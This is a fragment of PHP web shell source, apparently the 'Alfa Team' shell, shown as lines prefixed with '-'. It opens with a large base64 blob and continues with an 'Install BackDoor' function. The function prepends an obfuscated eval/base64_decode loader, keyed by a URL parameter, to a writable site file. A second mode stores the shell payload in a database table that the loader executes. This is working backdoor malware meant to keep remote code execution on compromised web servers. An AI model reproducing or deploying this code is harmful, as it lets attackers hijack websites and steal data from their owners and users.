XFd9j/PY29wtreW5cILUwcWAW2HJH6uAnLt+/q6pUrvx8OP+BsXRkJDLDuL974QsijG2VTmnBgx9nJc6pxxWyNj5Psb4SYkk8AIuU+90uaAR9tbOgtbAQ9c2B8abkkW77BNN549AsHT3oOgTOnfDlfnQF620L3YylWzXGLmyaqt6bURSypbBXAL4O/Zoe2zwBWaJqPuZp1AvajzYLNd6Ot8IJzJ2e4p+2/bWvD+IXwqlpCmf+snkqH57r21TJVrE//Blu0pQ5P30nHZx0iZVQzj8J5RtgAK8hHyoF9pb6IDQ1FAh0fwS1xKw9CV26Akl9WAjmnekk08mypUe7BHvJ4IlqX74klvla8vaFg7RTnn7YCh8BfIQncZpOoTD48Oyr7dCxkhc3P71ByT5PlCQCk2HeJsyiDpj8TfIWSq2bUZ7VF/YaFa+25s1h0DMUjOJlwBx7jGiGlwOZo+J9oTjD4botXy5KhHwie/nWijfWan2EmEcUQmBXW6nF1hsnxHPwUae+7bxFON7BiwdLXtraZNOwOHE4pGw8EGwYdsUbX5oo0k+IMpIlRWFr8O4Q5JueAsvQKblgKH50+ryjbq23rYUlJOnZylimcoOe91563cegS45pTVzKjp8mDoVA8a+JzovMQxxReoMRHhfXZBWPZbJmEdBfY8NBTbM4Tk3JiyYZFQsjIWP8Q3lsCcFmDRwGzqbb9mGoPh/mPnmiKma1JUj7/LWOaOeEt7AvJ6DxQJeTvsqltTUctXatzuZYDmrjt/oF2o8TlmlRenEnhESn4r0wpeg8up8kcmsexYB0D8y0Si76GxIXlxAwE7yWnTsu05J0ZVZofLEw5amx7zSicDBXBbifzeJGQVPiMZt3otSFseVeGA1jjls5nQkKsixGJoyKG7cdRJLwLGNvqlcki9i2uTR3XZ+/9qiU7PwTAl6kgkuGJtiZzqLArA89jrjZ5HMXjTZqHwfTXwgB7Ylj1f72QPKyyZAgr1OZu9Cg8EdP6Is2H3WHU1oVePeu0UUyBQentGBFxwT0Omi0cD/VB+Hvbg3uqcKZYkTbxKxWLQpGwmDeKKN6kXrCLxx/3B2nAAhhUvA9+jtHZyi6kw/9M+HJuJUadULDWHx/ga8Ivt5Z2erCNc5niDfhWmwe5/Z6uD/DMOHC2qa6RSoXxqN785NB3X5SAx91IGmIdCnXN1k2hyKqGqQMGc0BHRm214103gNgGA9bBwN+tjO2sjiWV13mhzpbNQhopTl5UQzjqXZrTFs9Jiar1YMpf5KhYjpdWBGiolSnC3DQX4oWTy+Jgrf9eQ4EqaxrYdAEcpkVhrUx/1bdOKnHCFvizvKAnPHPaHObFUvnO2bGj4d+O7mMIVx2POcn8wLG4r5vZRL2sbAin4CbqepM2T0sGERnxTYKo4thfDDVCUZd+L2LnrDILbI0S2wAAXNHHhDz01rHOtIXONPA36v5Z209C9jtFIs66wnONRuxgu6Bz+JYehq1V9OY3n5OsHBuTgIS/jf3x2+0KRXgfyr898V1Pyw71jNMbiGUH2LHlvzVm5MPPoo1Q2+KfU8tug1FHC3Q17/1CNcS2Ngd9rNeWhQ3ElO1T+48nqm/TCfXUjnWhrc+bkA+z+d0hDBiuc38cA+PKp9ccYVvdd4p7GlEI+qF3UMTCY3iw4Q5/7RdLLoE8qE/SxiTS3d6ZH6xs2niWWWBr7/VwC8GTuUrkF0n49pH52NZMqfCEYKrJyhxohnO8EbRNn7UAGPjqo3uaykj5BdonaXeZNgqVSHRZpSXtd2tA/LJolzN3fvPbwNujNhnuM1Mmrl7qephea2+66ZohTtv0puCUXQvLigyyvUMj5a6YAYOFsjNjMavHAwU9rewMskUb3u9+Bpi4YeDI4xbWrRtrkhmm+S9qt4lGHoVc62n3lKuqvcQhud78bcpiB1tLuEDRoMRLmsmEOO1JMUA4zimDKom849BpB15uD9U540PfWqiuTK5Z2oc7AQvzY56FTDt90pVK16IUtkUXaXLXKWUy+2yl/ZoFnDLV7wQl+FxVNSpE8CoYoLOpvi2sqNxXNBW53TlQMMQV5qmQ83yHG46lv8rE241d9pAMUTMkU5X1+Xjow3snARQVhzpxVjuSgKerRPyaGqp50oPcvG8foUoSXMuRaXYW52xvDfXbp7YgmZ2qfNpDVpdPlm1yyatfIA67MePpyzIJjPlLRV1ZPIJojKb5+A7KTZyL09830e73nwsgHWbfTaWL+zRmxJ+UzeS2w/AiwxK8iNSsL/MqI9dPCwc4BCTB+6ap76t2Qveyggbx0sJ/T3Attk9wd1PVH4g4xBCu2osR9U3PpuWYesLSVbxmilmr0KWpLcWaGfxb26voGijFLJvcTTfJcmr47tG8gWemptyQz17sD44u0v5Uvc6Pa2Ef58ilXfuSqfLe/knj+MMNS27xJSHx2W342mxzfIbyUTFf+hV7RlDii+obPLUwDy73xBGKdMcSM+/e4HopmHJDW4a2YhM3wD+xgdZWj6r5UMPyo0Z9/RviqKZHYp8yv3AP4y1ZFNpuB9sU5r9DoQluZ/49P0uPapjGsrD2cGeC0MiHF4HnLSF2hwdgB+REgydFwqXd+hYr8a9kdktA/htTanub9cDYQ+XmuUS7nrd+HOGuvh9V718PeBa6799T7a7fylKH37MHRv7V+57tHWRQSaTWDIo9wcIiiXnL71OJaENnyD5xjtOApseNeycnr0CeKGegDtKURcrb0YMezskWSNQs+OmfAoNd0skWadvsKvhJYWZjbKyEzK+T+h8ZAukW9nhuem6P9RwUy9e1sHPlkqARlBAJ54Trbzx+cucpmuvH/Wavm07aIITbNRUBR0/UOB0gWv1WMvoSCPA0sqDSORA3IY5sMXEY8jPSNA9+cPrm+1oiPi1Hz8klLgiMaKAVrv8DV12+A8mecQn8QlUZ5/GvsDziCyCaaz1ohO3oATUKby79lLUbbOkK3Zi4eDp09Nn1B0bqlqd4hnRBClC1JUfmB+de9bv0/5VH5AUMxcem5tZqx+5AZqCgtNHWjLzqucbd+09ZqO+gOcOgich5CAOGOitsLtiCkffgQ8fFoE1fhxn/XZ4apWyqLL8ROY+93WCNylzXkBpk9AcNSDKgMR2DyTprUMpv8xcYGH2SC2sXlA3mZZMBK0VIYhfMiBBww7oZdIV5AV4cg8FOWDMSlbyZksJ0uFIEco01Z3ReoQu2AYeu6dBO6rd4+XkXJwDWtLDLiFpQWlca/H1bXIGf6jYf7Nrzf+2YxEbnKI1+2ZXAICFxnw6treBbWeUEPImHfzmdBcNjPN6c8Zr3LTbCuFszRFro24Ec9RHFexKw/AdGb5FSeh+0njQ8BahWaJNBq4IUZ2Q6E2swctgQV4eNkA+dat8siMu+3fd3UGpfGI8u64S8ONKwU32AG8SVMQxOb9LjIUij3e/AStt2sx+MPuo0xZbmDAR80gOYe/Ln5a2Ecy4w7sNlotZiJkvo4+cxUIpHzUdOm1TVi9qmRbCap6UbvW2ZdllAt6Ddv2R/FDv21U7EDC3X28N6t28wyVEB7FBDOhRLQT9sHaLg/zwzFyFa7W2uP0Si26eHw0uq+kgLGwP/UsHPyuM+oEuJLcX7vTLBYpEvIklCCG49CIZjBxXRO/JeVNkmBsg6Eo1kBCvGHmQUO/fBh/bwieTkkXSYpKwOL/fgLlGOtdD9S9xsou4ro0dX89Y8356wGQgtdaWQPUNuyV0BJBQ4CUiexkcvxCS+HialAcDBchSCZdtS3tkY4qyoc2WnRtKIhTdLZRD1nBEbu0QwdOmDGUfXJ/ZJd0gppdupF10/Ur+Lv3tp8zoAvhmE+DpWS1vtx5yBOp3rMqVYTfUZGBziQAPU/AOSx0iyZoYoNXc0eYp5HF+YLcuRQ+baE4tPoW0JvkJ+7IDKfXzLZ4uv0TfP/W3PJPF1Lbju3yoKBR9LfsLf0wPRd0sZuU8L96PLFyaPZdkD6pnEzMlBX0dZo5Qg3Jk7+dRxa8tIQSNhQQzX2IJRbPfkMn9KXyJTeiDYmWp7bN9GON9BQJRtpQ9Bj3ss4FD/MylKdVKyucNY/ggJNszQxLcFhGmBX+/1rzqC6nZNNB7Rp2CnpsKwelsB0LAoKxLykIB69tpN7ujvblRVy+fSqE86YlbXNwmAes/L3pnxouT4ugivp27QaXCsbaodjjMRlOZRwgBqqE1G/34w4qRelGdwkTbk6XNYhfi0UHg3kHiUa+eR15dn6joQXYg6rTv867/2c3Qylzeb+A87org/kgIx5NweiDoKGIm9ISvKHD7DTnI2WYVgRwFGk7FPqDg50PyUfRZbY54KbNdLpr7wntQ/j3DGeTFwJVMhPwoJhk3jJKdRXJgyw+hpxMDd5QlO0Wpb/9oE2h+ErWsKUhT82al6yaYjUAg82bWbcfRNypbBhu+RO01IllE7TvFQ5QYfVL8fcX2ewIjoMURpWMLqcgQtZi4pcCxv9i0o32LmsSGVnX62ebCTZf8jGZnG/R/ySzIqm/hrMvIyUrzjBjD8+xWKA4P4EiGzNjb0hqY7I9JIm/jYYrCqm7rQI/wo6K6L+TLCUSdBUyuF7e185cgKrPn4buqoXnDwKD3YRs7CV7SL4xPpLLX9xhm/F1qt20LLhtfHvGYuH53DgIstz6+aW7tS9ZCSEw4+0fY5RUr4Z/rvg0RrTWHyCMBgbyCQAtVhl+JKE4srNY3fWRnUDBq2KccWJTuW/6lzwO2pEOazvcUl/mrw71NPCUVkgh+WuJP1x6FQ7/1ltS/36OcRG7tF3DcmFQlIRalB84kH5ApJNvgnzSUf5ecNj7bd87Q4slP+duC+A2H95ITL28H97vAywrMWIZRO0lAlz05ebrDbgEhl2nXQH2ufrHvQbif9KVl6wl9Gmyk6LDQ+20Xy4LeOg8kZHifiCOKpAh6ShsaFRVsJjPGnU8AV3AEoHOeTHeHqdZ61AL45nqcTb/m8eZDb/2AfVYxkeYHrIRjUy6BQzUmyIyyHQFKovCcIuxGrXYj9sekzLpfDdaMYTL8PXS0AnaTYWvxTNYsFW2/dFo09PCHtoHSmkHtL2trZ8prMFUm7s+JdHXM7KSAtaC7apQy/FnqC3IYiMX4anUIwhBoYdI4gtJPupPLZwk1YiogLLFO0ffuF8YdWAwnquCIwhy4OcHwRH+1hjX8APRvu2vFYAXwu+xhEg9vArMkn18RuzIqIWsdXWaw/NdqGI3Zgq2CACSxMdlzdRPjuoMBleb25+zHRxismhobGgtWJTBqT+nve9JwrxxZMDFCbNdT60w1vVJXayuNWfhz5x4e6yoXf2uaeZIAWWeSPN4xoUWd0t9hHrM++KV66s8girpIZpMfvz2Tj3SoKeYtu78G+myptInoOZK21NLlPa+Bw5UM7XKGY5lHl9ES0rNKvz/Lm3/M4H0mXpGTkrPe1sLDUwfm7eklpQ7R++eiIKTxOGNktUnNSCf28vXiAIKlmZPDoa40mGGwRV6X7GfyOcXP0eyTuqLC8xtP3uoXI7JFnN0PXV5GxTu3ZJyfLybYC9qjwBsAUqc0CeslL+yk8iySIxxjAPmL+WNqSsjUctrDte7fxhT7ftfa1ao/ZY9nF4Gy6CtqCbh8aIVfznSN0FWEzgB7W6XNxL2XbtelmXyEWvDnoDNcPr78U0vEfBYAHxk5kNha3Tr125W/16RosasMA/xN0wfitQCfvYRyqzf+3XGpSC+uInM/nRCeXteuICYCGqNXs8f6M0RY31pr5R4oQpP5hHXFE17mfq9HrqumN7BvhDw0aVhuJhsDGsNc+iJF2k+5Q374yZI9U860gWtEuSF7qa1hKo64l3PT2kJSmvCAjQEnV6crorfD5L0+01lovtuL8cvMGRLpKd1X8JImt6SsYaJd/nKf4JZILZNVfH7BMcwDY+peBqruCqPHEsCzSWCMp8VUxYtoDprYl4f6RqRgs2O4I2mN8KASnvTr+lWevn4koayD6eQ2/R63whe883q/a/OcLokhcrlH/QXNoITXgDGkt1PGxYIfK3D8rUNTZo4OTfpAmwhP7cUGF3EwxgMiVyHbkpCC31/m99d+OSZO6Rblc/g+2CEGt1DIkAjANyOmkC8XYzqxzzSXVvbvE2VGKJarKyxRiorkU+yV06DLqXQmcjRIgDNStHOuooWxO9fpR/i6MKPuu6WRM4bPcERIW0+HhxgRc5ZUYpMC8Oh2yhCdkzCJNHxrLmmbIwxmNERiO4rMit0QbxjE4rIo3Ai2OAR7YC2f6CRxbqSuwDVAwLn927X8RsqSL5iMZWXEJt4ooSi+eGWx9FLv3x4lR9BdAgjGRth8tS/541jiTqgEHwrI0nLyZ2KzN+sJew5DRdddyJCPqLzbVRf97Kedf1jGGGpSnPO39pAUnwMVpmfRPVH100xevIpFtiECfM9FRuGetMYprWA5Si8hcW/GykDidfEm5hhFycNYffrWxjVT7yH351Dn6qJzEvzc1gbDb4hYdhUyMrd0mAtr6BmwpHQsNVRxRpxMHaPm+rcNGbaTLnG5vVbtG9quqdnZArQarRlOXWMcsFdh62l4C+M3ITcRiBr0CbQmYP9AFM8fhR9o3velvTU+KugTPZHp0JfqPXuXXAaV7phd68vPHiD10hE6INXmMNI2rOdcs3OGErCb5LvQpR2GziqbTUhzBdbxa/szKUZX2fJkQU79vO0zJRzlbWuW6/ysn9kAMBvhE+eE0W4m8e0P8PJcYppm556l7FyCI5gH40JsY5Kxo/rCHfepA6kWdFbMzdoZ1I8gSLAzyCjrEVO8wJXWyw5dZ801VLESYkLFGOJh0j5C/6pge6HQVcba5tZNwhXglLTGJLq9ZJcR4TD+F07AupIvSsZy/+YWepzrgzphyEBQ0xzOKr5wzFjL9DVeCx6DXnzWBrUFjg2MCvh0K6nqWMP9bKvreoIsDoJE1N+hZbv/S6nMAG0ixv1BnsNLAhWKnGVJyJxXdlnQ9Q9wRwMc39PObcVjNgYMXVLS5wWIAno8sw1xaT1uY6iH/UkIx1FwLKxSgLdGSUg6B6B3ZuJGQqZxKcZ9CBqCg6Mx0VNTzIbK3ALvWmHeeaL6pf/YKaOiH+6Wwc7+/IJEK0pQxdg1EunjRDAZR/wpIC0Lzp23+2mf9aXPs4NueZID+yF3HhvORo4izC3dp17TIYgk9rfQLiZJpswpp5MxyC6rSQqqpURtoC2rz/UxFT+JB/bFTYf+jHDxjqV8eSmH2K+ywrldb+79Ec5P8hMEgLBUtjcRuTGI2i1+3vW72Cb4Ubhcr/xaMQwL4NtThRDdhdWRqIM5RToUUGofpF0kzKKpSbnFSuFl+oH3KxVl6QocAK61sMMbUjvOllSspdekHgI/fXCKqCAVOIyYC2A9iEQs/2wFnzF9JThgaZg7uVcPMmX3HfNFBOHMHFh9CZLOCuSTBFcAMm7tQ6/m5JKefY0noPpNmUGq3MACSwwHXTiNqer8STBXcFcqCDO0XwN81wBivJhIQ0NQpl18pMyF942+bx7VJpJmu5Tfincsj64mKvp8jEVJ+JRl0VA9mP6ep+w0WRHerUTtrGVe8+dd4/EceJDVedbnpmGtnO8+65v5Y7yodguKN1ji3eg44c6x8p5MfTZJU2VlE4LWPbFCOlDa5R+kdz235yFpagvpEc/cbSoVk+loch5MZ/tSVwcFSlWSLgeM4mGIBCymhEYi/FR0FHojzYUmZwwyB6zKsrJ9gotGlcFD03zUviZrFtQ/Bn3rykWjmnO2EMnyuQBqGqr28bjCVg3VjBYgqAhVcN3eoDt825S89Le1pyx42sjAGMTByKKluX1LfJixc/4BDImSt72iFsidP/4CzOUcz7UYLWdj2LvF6VxJZ8+nfoKA0EF7fZDlE32IL1XLh4bkiEVL5J29pEHoCpB7mcT3jBLxKDvDFDh7BqzvoVrlZ4c9Q5wPNb5LmGrmdK19sKp/rtNToWAGiNNMVQRy1w8VvyhjEERF9aFJfBuJaT7wYv0ILp3EqqSCTluSt+9hez1mr/Dkb83B6eG4FAmVDKDo71zZpCi0XbfElNKLRcFJKaGkrVUWT4ZVZBPV04ZVEI4QbvDxkwSNrDS4VRyBwO4FAD3NH/ViORN9Qmso8i46WLkmvICdJYFAbCHc+nQnVkzzf97DtzF6+r2Nm7nmq1PdJ1+xQf7+ZrK6qjBGZun7GF2IMgQ3Jt54fsFsUkVHGjTgR3EpDUfQXf/dcxF6uV/i+NqdgvOWuuo/yzmqSh47+vdcdwrF11zd09Do2QhN0wGadmsJyU58NTPiS5gKdpY/Huc4b3p0KSkX6tdMkp+0xf58f+dvbxHS1wugWoDetQOi0dZ/0Yy2e208Q06LLDl95Z9N5BbX7MrVui4BbTPCXwtjey1rIS/i//ZYCn1vDycSYJ7LHl/agr7FLU5sEFTMaKhfV4UoM2JPP4UCKKRb7Ex+OulfNNbaNxE77FyFwWg/mUoLR7Sw6ONGOR2lHqD0YB9b665lthaE9k+/VnR8AXCr0wPbttaorzFK9eCj8YhfLZeiCL+fZtkTXWG8rwWP9OSRP1nqrxTUMOMDNyWg1aWIfphyTP74u8XwEDAfRNTGJHPr1toZqQOr9g8WqrUrqv1iV2Mkqg9gaIibArfixrcsbm1IE64ZeyySqEdvgUT04P0gYsp8Ty70UyazZHDciPzwov0ixTjTz+dXe6hxDZmgqKkvA9NZ6Gl+moZ7v+Uf2kH0ie/TkQerx/msYUnm+TVHcZkA9ilFSJJezCZhrMWkQBesLJjWkYZsQK1E2KewAOINZ/Hl2djAhYl1Qi5qIeqtEAt2cJ+pCmjDKsorVBylxzi4ccokry5D/+YcDYMT13IUM+vCxwWYtKG8iIFsM6iqHjxC5D0nRH6qkhlc89HolVLN5zFlPXyuhBjz0uWiqQ0ucz1Q1LhogMZ5IqkRZHJ2q3gxGvRbm2D8qvaf55XU9HRPDoSiTeC2ZInqT/H7ktoX2La5ZZqbfeL99etG7G0gvClDGL5WPpYv7Fi8m0nUt3DYHAHkErBFZymV1gfwvJZEy4FrHKm6U8YVTYBZ2IUCBsJljT1qWhR/Njj2Sm/VWVDoqgnyl4rQPW2quZuRwxyE1mhzqWviT7M3tjX8RrmYbwEzxddzNuv3W3JsDhDpjcqOUaa6rC0UuzFT6/GVVsJ0mIlJgvUtwiEUeRkBuiCwY3E7OQPm71AgEHtz3UVCJshOXlhKoxD2dlr678UtNXQeWBPyX7OcvOrul/YIksuS4c0QKUP7PvAIhYsN5y2s7lkZ/iDT+joIKB5VakwQAYtv40tiW17k/ng/IUoEIXrSmpBeR7swKPA56UGhyC97SEy0XOdRhgcdyvwUFxp7HpuEx2m29jATrQjimLXPpExvKsCuGTQuSlp9P9huq7eTsGS763dRGNpbeQ1WizQpBkqvHf5nx8WyjKBXm0nh18bMpysVUFobT7Sw8f32wwtEfTTknG0rUkEJGqg3HSO2NzRVvgOJCMhaKJ+YWos0zbx06i7WhJtoglmtKBts37AWGqub/HXOnwtDZ9xEpbu9l3ZgqPmxYT3VrR9QGE8LN8A8PY3/PQxJL7FTgmtg0Zwg8o7IuXd/RtQFMDqccUheksGeLWqo3ZhTL6JqbyAe05QvHgXK7ThXdRwKyW6gpTM5In+n8oIhOc2RPMgklC92loBG6BIoN+WmlvAhd2CKX7iV92hd9saqvFWX7GVuE+suXvdzgL8/mT1a/RNxgcZIgEyxChm+6qyvls0Rs5xTP5pS0ySxf/SVyH0um5ITthhsngCryhIlsIPIgZnMUEaQMLsNDHnOnctr51selnEqxJBUqNBttDK43ItVmaKqlEnJeG0YUBm1V9ieYBfMJ3pE/hg4uk3N54zxlwX8WeaMcCoDMPWkvkxeD7wAaBuRPlWt8w5RB51DH7hUnz0yqPV5BDQtRpjNLRi/CA7Zyl8xhkTpiDpDq9pKdPRMeVsf2zAUbG9I8+gzrJehO2dUtajlLTQFKm2LLmHJuWt9JoN2ATX3GoGwBnDhFqxggo79xZiIRSoAZmTSPvTfZw8kgl8ioKeL0yDGaOU3yUDC4KpaHhnA7a4qWKSQSQC/5v1l6cBWgx9zGQzuhJ0FsL9Om0SdhzT4avvQtqjpeB2lTaPw+Tl7qB0vrMUAyCO6FWSmJggg+8U87Kqy1WH3bIuPEuRg5bStPs8ixgLrHJ6gxf5yqKckJz2AjAaN1+eQsMAzmwpb6dgz0x+cSGzGlT/59cftRJ5FrSqq9Qn9eFmLmHY8e2ek3LXE+2C5+DwrERN7NY5HXlPdilWvu1+fc2pn6sekEz+JADtfjJshEVROvTV9d4Ye6QfI/L//aqC8Rb/46mZdBrQB/VUnbL3IuqM4XKpANVCEO60v10hZVwSoYHYRhXD5WyemQpGckduBa+PRa/HfWDisbSpORXi83sw+6h4jqb4WPP2EGwMSQroATZd90zoEtLAUfO/T6ui3fIXkmJhtE3vkSJQh1kysU0SyIQaGCS/HKQAoWwF88MLXeLRw6m1yx7sm8x8asSOGnPvsenMdvsJsTFMF9FTNEb5MBVVf9tb43QAGl1aE9Vf+1uG0H3y+7v7Hk58qZ1Cd/Xyvp3NHTvCh2jJv0SvTl1btLFKAfvtCKXDtXzajdNhkMiwY803aMNq+Fe8EWzSwtco4wphTLn3c7x8jTX0/d8mE2tlaTZGAbJWOvlNgXks8dxjqK/QwrzsIRPAcH+sNKxltutz9kz0TEWczlje8TEjaRD2g556hsXIjr78/G2obr5bMlsK/OPDwGlvthoEwF+4RCzmYjlwFk5YM+/brUeB2Me68L7ojwUv2o0O5XwaiNF0DnGVqtBgGMmhjoUuMxf57pt8j2OdEcA9dYwTPmOtJ+2mUTBRbkz/AySRFU58G1PsySLXsl3F3NqvOklNjgPgJu4R4b/CRXPvbyuU4wHnT9B94SIF0U8IcA27W8JcHA7WA4Ovg9vCAMFk8hTTREfGBLK/VKw5cS5lhjmNDA54vbvCcFXzg2dMKqPpd0BVqK4O/bLM7o2ZYQyRXOzOnY69fNnlDx5NaG/x7PiVimy2A18u9TlFO+KqnMwOwMUsW87pVsKSS/d07hZndSzifyZUoeR+F01WUrS/X3179MVmwWK2JDwBRqwvh9FWiPnZbKDDYs1OSHKBuINGaq+2Mmk9L3hQwHMV3wPKz5FG8Lb1Et5RyowaANwN59uMbQwd/+Bi7A+0ZZz21pmUOqWpneLDL0zOLUZik2bdcRTMPpCKvFrXhvARoz11b47yMCbU6ITS7WOJRx509U6l2hSX23T00rfJuKILsm+fuDyHSqU5UXmknU2QwbVyF2iJkpJWDgevQSIpUOB8irxUSS3PMQC4APwVS0F31jUluyryhr8c3KQhNAKxRcZv+7Ii1+GRccemzXMJdukYnTRkF0ddiLDPJEK0fVT9+3fSb2FBRxD7ryjWRf72R9bjvYX4QCBNoDMq9FO9H5IBDYzGcwwW1Hskjh9tR+xDgh8c+S7BNcTM5gBzpx1KfXdK48GeV3MbfsAwWXqgP0sO4JfgHTMnCpbEMWGRq73NGy5kaDTwmb6yDC4OviQJWPrNsEHliVIMHpIEFvk5/ipjNaXfBHIWHooX4alu0EPiKPM8FdRu7sBxZWHs6xrx3mQhhLWlxmRq7FiKA5GrBQxgpTjtEIXdd1ti6lb/eA5cir3c184WaB4IIauez5ULxPnYRzxArqsfZZfwVBWnxxh9x4d3k2693X1NHlf+OSyQy7UJI53hBk75YVO2cYSAHQanLy+OOYea8WSDHcco809esTUad7+frHJ+XSMN61/eJLX3WebudSfmQh28n/grTpi+rNoa+NnmfK/yVxONW5iT0vPcz1FPXmjQa6UwY233jPaOZrHQFBr/K9ix0R8Y2V0sllqm/MeDg5PCOMuH3jQuI0AQWvidq7SGTFxfCndJIJppAQUGf6F/25+WIAbU6Ggqkiy+78LUikerfG9BSRtL2UZrZvXZe3djCiocTWMzMT1SaWLEoak0/reYf3aJtZOBK5VDbabRuxW7osqVa2aJqfuzThfp17BHubE4lk23Z5yoCtS7gYoKlhtNVrkAXabeRc8b4wG7xIzDENJvFTnVh/aRDy6UwxGfMVYsivLBS5lJaiKlziqO+M0jqsRGh1pjdAkrw7KDzEYcB5LkLY4a8es/MGd5hUpQdVKuwFvwybS4eCQfQEsIihvhek3Dvw6WEgymS9eZZ+cQbM9dqZD+YVLISVC3xfMJUbf0J8Y/MLJrm312VeN5rFfGU/dJjWkQxRLqs+jkZzPVGZdKw8wOhz4byzFD7NE38cLyWpyAdwGJZjTOOvVCokZVjayF0GzDvJU0YNtdFjspfCmtrwO7zODt8QXaFjOw9tZ+vjfKlMjj5kGrRmzftz/WlsuayYgJfYByZaN5ZfPFWCbFzIqT5QeLgJpvnKRND38bDOgLRnwHSmhNPhugQWZ624Fdtyu7mJ6+WfnBCZz50hB0GwwaXJ38zJd4MJ+lXC+N+UtI2l/kGrxh1UnirWZ8PPwU+fIgLojhJHPCrVF68kfd3rRnfd27ty2hnKe95d4lEdWXkv/3gw83HpJuwXm2QA4d2yATw32nNv9oIz9EFTZtjnnaH+TwBJ/nZmF/+1fr6s+j7wXxe5uvwn4x8CFe0nuY4O35QStsW3cmOEZVP7lKWoesWEwxplibWHaqXEOWpmMmxOowZn1OX5H6Vc1J7uHDqoOnNIc+kSYw5zV/ThvvXTAjFcy/BxJYYynlQX1iMm0/8pRXQgIwucpWFUNIfH4EXxfy6mNT+blmO///fBsb1A9NRcS6W5f/+AQ==';
- return 'data:image/png;
- base64,'.gzinflate(__ZGVjb2Rlcg($s[$r]));
- } function alfainbackdoor(){ alfahead();
- echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
- $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
- $success= '<font color="green">Success...!';
- $textarea = "<div style='display:none;
- ' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');
- \n?></textarea></p></div>";
- $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;
- ' onChange='inBackdoor(this);
- '><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
- $cwd = 'Example: /home/alfa/public_html/index.php';
- if($_POST['alfa1']=='file'){ echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);
- return false;
- \">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
- if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){ $method = $_POST['alfa2'];
- $file = $_POST['alfa3'];
- $shell = $_POST['alfa4'];
- $key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
- if($key=='')$key='alfa';
- if($method=='my'){$shell=__ZW5jb2Rlcg($shell);
- }else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];
- } $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";
- $x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));
- ");
- $x("'.$shell.'");
- exit;
- }?>';
- if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));
- __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');
- }else{__alert($error);
- }}} if($_POST['alfa1']=='db'){ echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);
- return false;
- \">");
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50') );
- create_table($table);
- echo("<p>{$select}</p>");
- echo($textarea);
- echo("<p><input type='submit' value=' '></p></form></p></center>");
- if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){ $dbhost = $_POST['alfa2'];
- $dbuser = $_POST['alfa3'];
- $dbpw = $_POST['alfa4'];
- $dbname = $_POST['alfa5'];
- $file = $_POST['alfa6'];
- $method = $_POST['alfa7'];
- $shell = $_POST['alfa8'];
- $key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
- if($key=='')$key='alfa';
- if($method=='my'){$shell=__ZW5jb2Rlcg($shell);
- }else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];
- } if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){ $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");
- $q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");
- $r=mysqli_fetch_assoc($q);
- $func="cr"."ea"."te_"."fun"."ction";
- $x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));
- ");
- $x($r["code"]);
- exit;
- }?>';
- if(@is_file($file)&&@is_writable($file)){ @mysqli_query($conn,'DROP TABLE `alfa_bc`');
- @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
- @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
- @file_put_contents($file,$code."\n".@file_get_contents($file));
- __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');
- }else{__alert($error);
- }}}} echo('</div>');
- alfafooter();
